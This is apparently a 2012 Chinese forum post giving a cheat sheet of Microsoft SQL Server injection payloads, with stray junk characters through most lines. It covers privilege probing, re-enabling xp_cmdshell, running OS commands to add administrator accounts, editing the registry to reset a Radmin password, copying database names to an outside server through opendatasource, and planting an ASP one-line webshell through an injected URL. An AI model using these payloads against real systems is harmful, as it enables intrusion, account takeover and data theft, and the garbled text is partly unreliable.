//看看是什么权限的, b( u. m- |. i6 _! w
and 1=(Select IS_MEMBER('db_owner'))
! h. z/ D9 Z$ W8 mAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
) w$ g; [; z' r" J9 l g( M; @3 D/ h6 W4 ^: P% t
//检测是否有读取某数据库的权限- Q+ d) T6 F+ g% h& |
and 1= (Select HAS_DBACCESS('master'))7 h1 n1 a- ~7 s) Q
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --! U* H& M0 A( Z+ G$ J; w
m3 o5 T" O4 A2 q
: j! T4 x+ H+ \8 F. _数字类型
% S/ Y9 ]8 u* v" _2 yand char(124)%2Buser%2Bchar(124)=0
9 @. k/ |( u, m
% [: w q3 c" G& Y& u字符类型
4 a8 Q. E- }; m- Z0 q, {3 {9 d' and char(124)%2Buser%2Bchar(124)=0 and ''=', F- g; r& X) x8 d+ r4 x
0 I5 V! ^. o! Y$ q/ v% d2 }
搜索类型3 b; ]5 ~4 g6 t, K
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
& L# B( A0 s6 }+ T6 C5 F& v# ~
. O; I% Q9 f* ^0 `0 C4 N爆用户名
f5 _* _3 T- l5 f+ s7 }and user>0* p, ]5 z* }% t9 U# D
' and user>0 and ''='
. u& U @/ B7 ^% {
% N0 x6 ?( t8 d) C检测是否为SA权限4 D+ q# R5 s; T+ B. V, C
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
& n6 L1 E' Q4 j s6 M; cAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
T0 @ N# Z) B* {) i& s- e, V$ P" O4 t: @. ?/ X3 [; M2 Z l
检测是不是MSSQL数据库( o' I! C, C, c7 [, @2 H$ X
and exists (select * from sysobjects);--7 G, A) q1 t) i% {, @8 h G
+ {+ J2 e" T* r. R$ ^8 y+ q检测是否支持多行
' f" T9 L5 k, g) {1 A8 R3 M;declare @d int;--
5 B( h/ g0 A6 M, s! x. {8 M6 ~, ?2 e
恢复 xp_cmdshell
* @/ k# B& b3 g) N/ j0 r& n;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--0 U; m9 G3 G7 l( F; Y
7 D$ g- {! r; P. h3 ?6 V7 {
. K3 v7 W1 z7 P4 G4 I jselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
: o* @4 a% u1 u- T. d: r$ p- R' z3 p }- O
//-----------------------
3 U) H. n4 B1 `, t! h& I( y7 u// 执行命令
3 s: `1 V9 M1 W+ q: j% j//-----------------------6 V( F9 X; z, Z+ |$ ?' Q- y" Q C
首先开启沙盘模式:
3 i6 F4 M$ O* L' g/ e! t8 |7 t6 Fexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
! F% v( k7 N" i
0 \$ _$ b8 I( U- |然后利用jet.oledb执行系统命令
& r, \% V$ {1 t3 N+ r* p# H7 eselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')9 z/ L0 C6 {+ @2 ?+ ?
1 |" F- `7 v. ~, w4 r
执行命令+ t S: F) p) L
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
2 H2 K' i9 N& c+ l- q+ Q' d
7 k O; p& S/ z3 z+ ?EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
; c& Y/ r2 `) J; S. Z: c/ Y2 W" ~9 O+ ?1 J# X
判断xp_cmdshell扩展存储过程是否存在:
; f" w: H: c* T; f/ E2 z' Shttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') |2 _6 o- f$ z- z5 w
1 R! |" f! U% ^* o, F J* a
写注册表
' e2 Q! Z0 i! cexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
; B4 F$ V/ J1 ?+ k) z+ P% Y
" w: [: W6 f$ I1 M6 C4 i* Q# gREG_SZ
0 h2 o5 o. L% \0 I
0 D1 p, f* }6 c+ L% c读注册表9 i% v" P; d6 ^
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'8 W% B- o$ [( \9 X8 R- i" M1 O
) N6 N! x: \. g$ `读取目录内容
! V! O/ o6 h. K4 h3 c& zexec master..xp_dirtree 'c:\winnt\system32\',1,1; e! ?, a: m) K& j) H
3 d% o4 Q i% R K- U
8 j3 C: N7 h2 D: H4 `, \( Y3 ]5 r
数据库备份
; N8 y5 p2 B8 h" J$ [backup database pubs to disk = 'c:\123.bak'/ O: X0 S0 }. r7 ^5 N
* a2 h5 }6 A, q7 J! W) E; d! W/ b
//爆出长度6 w$ r, D( ?$ k9 H( S J
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--* T6 X* h5 z0 J# M5 P1 d+ Q
8 i: _7 L5 p6 b- g( ~3 z6 I
l- B9 m4 o9 {6 m7 c% P. y! j0 {- T2 ]& |: p/ @6 ?/ a
更改sa口令方法:用sql综合利用工具连接后,执行命令:; l) b+ o( A2 K m
exec sp_password NULL,'新密码','sa'$ w8 T, ~3 u% H+ y/ p7 a7 z
3 a) ^3 a1 }* }) a+ w/ h
添加和删除一个SA权限的用户test:
+ n/ _+ q6 N. A2 N0 S8 v, t- fexec master.dbo.sp_addlogin test,9530772
8 p; f1 l) { Y# ]+ K" x( c, Sexec master.dbo.sp_addsrvrolemember test,sysadmin
2 ]' `: x3 ^ V# A1 a. ]- T' Q5 {5 L M6 H- w8 `
删除扩展存储过过程xp_cmdshell的语句:
5 Q/ g4 P2 A( n3 c9 w0 _% eexec sp_dropextendedproc 'xp_cmdshell') {" A( {5 R1 \
$ w. M, `& q0 O$ X2 o- I添加扩展存储过过程0 d, Y( Z! i; e3 E( p0 x/ A" a5 I; |
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
* O+ r7 U% |3 k0 C3 b3 [6 v6 jGRANT exec On xp_proxiedadata TO public' ~( [6 d( r$ [
) }/ f6 ]+ @+ w! X8 e
1 }0 n u6 x; w, j) }3 M
停掉或激活某个服务。
! m/ k" H6 y8 ^- f1 p- d! W- Z3 m! p+ G, V% b% d2 ]8 d! v
exec master..xp_servicecontrol 'stop','schedule'
: N. o c7 P$ F: Fexec master..xp_servicecontrol 'start','schedule'
b4 h9 K; L8 _- D& C4 J7 U3 U o$ c' t- V: F
dbo.xp_subdirs- q) O$ n7 c' @+ _1 i c
2 k0 u& v4 Y0 r
只列某个目录下的子目录。
; r( [2 ]! b8 g2 }6 dxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
$ }. I% l, }1 U! M# P
3 v& }; @3 e- ^dbo.xp_makecab" M7 V3 P* \' y
( H6 V3 V/ @- f将目标多个档案压缩到某个目标档案之内。3 Y; e9 z+ H9 \. f/ m& X
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。 \2 R6 ?8 n, L3 N2 h! C4 L1 j: s* G+ o
0 y1 u' C8 O2 N3 _1 Qdbo.xp_makecab+ {: q6 T3 V# |' @3 p+ \
'c:\test.cab','mszip',1,
4 z7 ?2 \$ H2 Q* b9 M8 \2 u'C:\Inetpub\wwwroot\SQLInject\login.asp',
( c( j0 I- @+ }4 R2 L'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'7 w4 i" g4 V/ }% j4 Y: V
+ J; B8 `" t V! W) J% p
xp_terminate_process
7 Y" W7 h- ?% C' m' P) L8 \* o0 n; G5 W! X
停掉某个执行中的程序,但赋予的参数是 Process ID。
w' F9 M) b. b8 r利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID# p7 q1 f, t6 }
/ H9 C! a8 t5 ?( c j/ A+ p
xp_terminate_process 2484
- w# m1 u2 y" g/ u2 p. |0 r$ Q' X4 g( I
xp_unpackcab
( b6 L! K- }, M! L: p' B2 A- O3 N2 h; _* w6 A
解开压缩档。
( L {7 t- R2 B) X& x
8 K7 K6 r! C8 m6 G' Axp_unpackcab 'c:\test.cab','c:\temp',1) h4 h, ~3 z* c* k4 ?4 v
/ _8 j( N7 u, a" D
* v2 o. b6 y6 b
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
8 q$ R* K+ b* b% U0 |) L
* R% o# M2 L4 [: X. l* W6 w6 vcreate database lcx;
& O3 N4 ~5 Z7 O* X; n# I1 D# VCreate TABLE ku(name nvarchar(256) null);2 v2 a9 {, |3 g, X E8 H& V
Create TABLE biao(id int NULL,name nvarchar(256) null);
+ K0 \3 G% k( w1 s6 v% q, v
- d8 m$ u) g* k" y//得到数据库名
- k: J- V- e3 A" ?4 Minsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
. v: d9 Y) r, l# s U9 v. N
7 r: O1 M8 n+ e
) `. p4 P! c: k//在Master中创建表,看看权限怎样
( n/ I' x, X9 w: w% f* ZCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--6 j: k0 m% g; Z% }
) c# R# a& w7 J2 e. @用 sp_makewebtask直接在web目录里写入一句话马:% S- i! }& L. D; P8 K% o7 d7 ^& Y' b9 T
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
% v. A+ f6 V9 f# [- a% V H9 h6 V2 F2 [' Q6 |4 s
//更新表内容$ ?4 V" b! K! t; C
Update films SET kind = 'Dramatic' Where id = 123
' t% \/ V n$ Y- m( E, \% R& k6 \: G" t( z: |# o
//删除内容- X3 G8 M4 U% P+ A/ }/ b: e# T0 s
delete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对